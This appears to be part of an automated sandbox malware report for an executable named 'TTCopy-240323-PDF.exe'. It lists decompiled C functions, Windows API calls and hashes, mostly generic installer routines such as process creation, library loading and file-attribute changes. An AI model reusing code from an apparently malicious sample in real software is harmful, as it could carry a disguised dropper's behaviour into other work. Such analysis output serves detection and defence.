                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                            0x00405c54
                                                                                            0x00405c74
                                                                                            0x00405c7c
                                                                                            0x00405c81
                                                                                            0x00000000
                                                                                            0x00405c87
                                                                                            0x00405c8b

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3712363035-0
                                                                                            • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                            • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                                                            • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                            • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                            0x00406a3d
                                                                                            0x00406a40
                                                                                            0x00406a47
                                                                                            0x00406a4f
                                                                                            0x00406a5b
                                                                                            0x00000000
                                                                                            0x00406a62
                                                                                            0x00406a52
                                                                                            0x00406a59
                                                                                            0x00000000
                                                                                            0x00406a6a
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                              • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                              • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                              • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2547128583-0
                                                                                            • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                            • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                            • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                            • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 68%
                                                                                            			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                            0x0040615c
                                                                                            0x00406169
                                                                                            0x0040617e
                                                                                            0x00406184

                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\TTCopy-240323-PDF.exe,80000000,00000003), ref: 0040615C
                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate
                                                                                            • String ID:
                                                                                            • API String ID: 415043291-0
                                                                                            • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                            • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                            • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                            • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                                                                            0x00406138
                                                                                            0x0040613e
                                                                                            0x00406143
                                                                                            0x0040614c
                                                                                            0x0040614c
                                                                                            0x00406155

                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                            • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                            • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                            • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                            0x00405c1c
                                                                                            0x00405c24
                                                                                            0x00000000
                                                                                            0x00405c2a
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                            • GetLastError.KERNEL32 ref: 00405C2A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                            • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                            • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                            • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                            0x00403606
                                                                                            0x0040360c

                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 973152223-0
                                                                                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 78%
                                                                                            			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                                                            0x00401faa
                                                                                            0x00401faf
                                                                                            0x00401fb5
                                                                                            0x00401fba
                                                                                            0x00401fbe
                                                                                            0x0040292e
                                                                                            0x00401fc4
                                                                                            0x00401fc7
                                                                                            0x00401fca
                                                                                            0x00401fd2
                                                                                            0x00401fe1
                                                                                            0x00401fe3
                                                                                            0x00401fe3
                                                                                            0x00401fd4
                                                                                            0x00401fd8
                                                                                            0x00401fd8
                                                                                            0x00401fd2
                                                                                            0x00401fea
                                                                                            0x00401feb
                                                                                            0x00401feb
                                                                                            0x00402c2d
                                                                                            0x00402c39

                                                                                            APIs
                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                              • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                                                              • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                              • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                              • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2972824698-0
                                                                                            • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                                            • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                                                            • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                                            • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 95%
                                                                                            			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                                                            0x00405811
                                                                                            0x00405817
                                                                                            0x00405821
                                                                                            0x00405824
                                                                                            0x004059ba
                                                                                            0x004059de
                                                                                            0x004059de
                                                                                            0x004059f1
                                                                                            0x00405a0f
                                                                                            0x00405a11
                                                                                            0x00405a19
                                                                                            0x00405a6f
                                                                                            0x00405a73
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405a75
                                                                                            0x00405a7b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405a85
                                                                                            0x00405a8d
                                                                                            0x00405a90
                                                                                            0x00405b92
                                                                                            0x00000000
                                                                                            0x00405b92
                                                                                            0x00405a9f
                                                                                            0x00405aaa
                                                                                            0x00405ab3
                                                                                            0x00405abe
                                                                                            0x00405ac1
                                                                                            0x00405aca
                                                                                            0x00405ad0
                                                                                            0x00405ad3
                                                                                            0x00405ad3
                                                                                            0x00405aeb
                                                                                            0x00405af4
                                                                                            0x00405af7
                                                                                            0x00405afe
                                                                                            0x00405b05
                                                                                            0x00405b0d
                                                                                            0x00405b0d
                                                                                            0x00405b24
                                                                                            0x00405b24
                                                                                            0x00405b2b
                                                                                            0x00405b31
                                                                                            0x00405b3d
                                                                                            0x00405b44
                                                                                            0x00405b4d
                                                                                            0x00405b4f
                                                                                            0x00405b52
                                                                                            0x00405b61
                                                                                            0x00405b64
                                                                                            0x00405b6a
                                                                                            0x00405b6b
                                                                                            0x00405b71
                                                                                            0x00405b72
                                                                                            0x00405b73
                                                                                            0x00405b7b
                                                                                            0x00405b86
                                                                                            0x00405b8c
                                                                                            0x00405b8c
                                                                                            0x00000000
                                                                                            0x00405aeb
                                                                                            0x00405a21
                                                                                            0x00405a51
                                                                                            0x00405a59
                                                                                            0x00405a64
                                                                                            0x00405a64
                                                                                            0x00405a6a
                                                                                            0x00000000
                                                                                            0x00405a6a
                                                                                            0x00405a25
                                                                                            0x00405a2f
                                                                                            0x00000000
                                                                                            0x004059f3
                                                                                            0x004059f9
                                                                                            0x00405a34
                                                                                            0x00000000
                                                                                            0x00405a3d
                                                                                            0x00405a02
                                                                                            0x00405a07
                                                                                            0x00405a0a
                                                                                            0x00000000
                                                                                            0x00405a0a
                                                                                            0x004059f1
                                                                                            0x0040582a
                                                                                            0x0040582e
                                                                                            0x00405836
                                                                                            0x0040583a
                                                                                            0x0040583d
                                                                                            0x00405840
                                                                                            0x00405843
                                                                                            0x00405846
                                                                                            0x00405847
                                                                                            0x00405848
                                                                                            0x00405861
                                                                                            0x00405864
                                                                                            0x0040586e
                                                                                            0x0040587d
                                                                                            0x00405885
                                                                                            0x0040588d
                                                                                            0x00405892
                                                                                            0x00405895
                                                                                            0x004058a1
                                                                                            0x004058aa
                                                                                            0x004058b3
                                                                                            0x004058d5
                                                                                            0x004058db
                                                                                            0x004058ec
                                                                                            0x004058f1
                                                                                            0x004058ff
                                                                                            0x0040590d
                                                                                            0x0040590d
                                                                                            0x00405912
                                                                                            0x00405920
                                                                                            0x00405920
                                                                                            0x00405925
                                                                                            0x00405928
                                                                                            0x0040592d
                                                                                            0x00405939
                                                                                            0x00405942
                                                                                            0x0040594f
                                                                                            0x0040595e
                                                                                            0x00405951
                                                                                            0x00405956
                                                                                            0x00405956
                                                                                            0x0040596a
                                                                                            0x0040596a
                                                                                            0x0040597e
                                                                                            0x00405987
                                                                                            0x00405990
                                                                                            0x004059a0
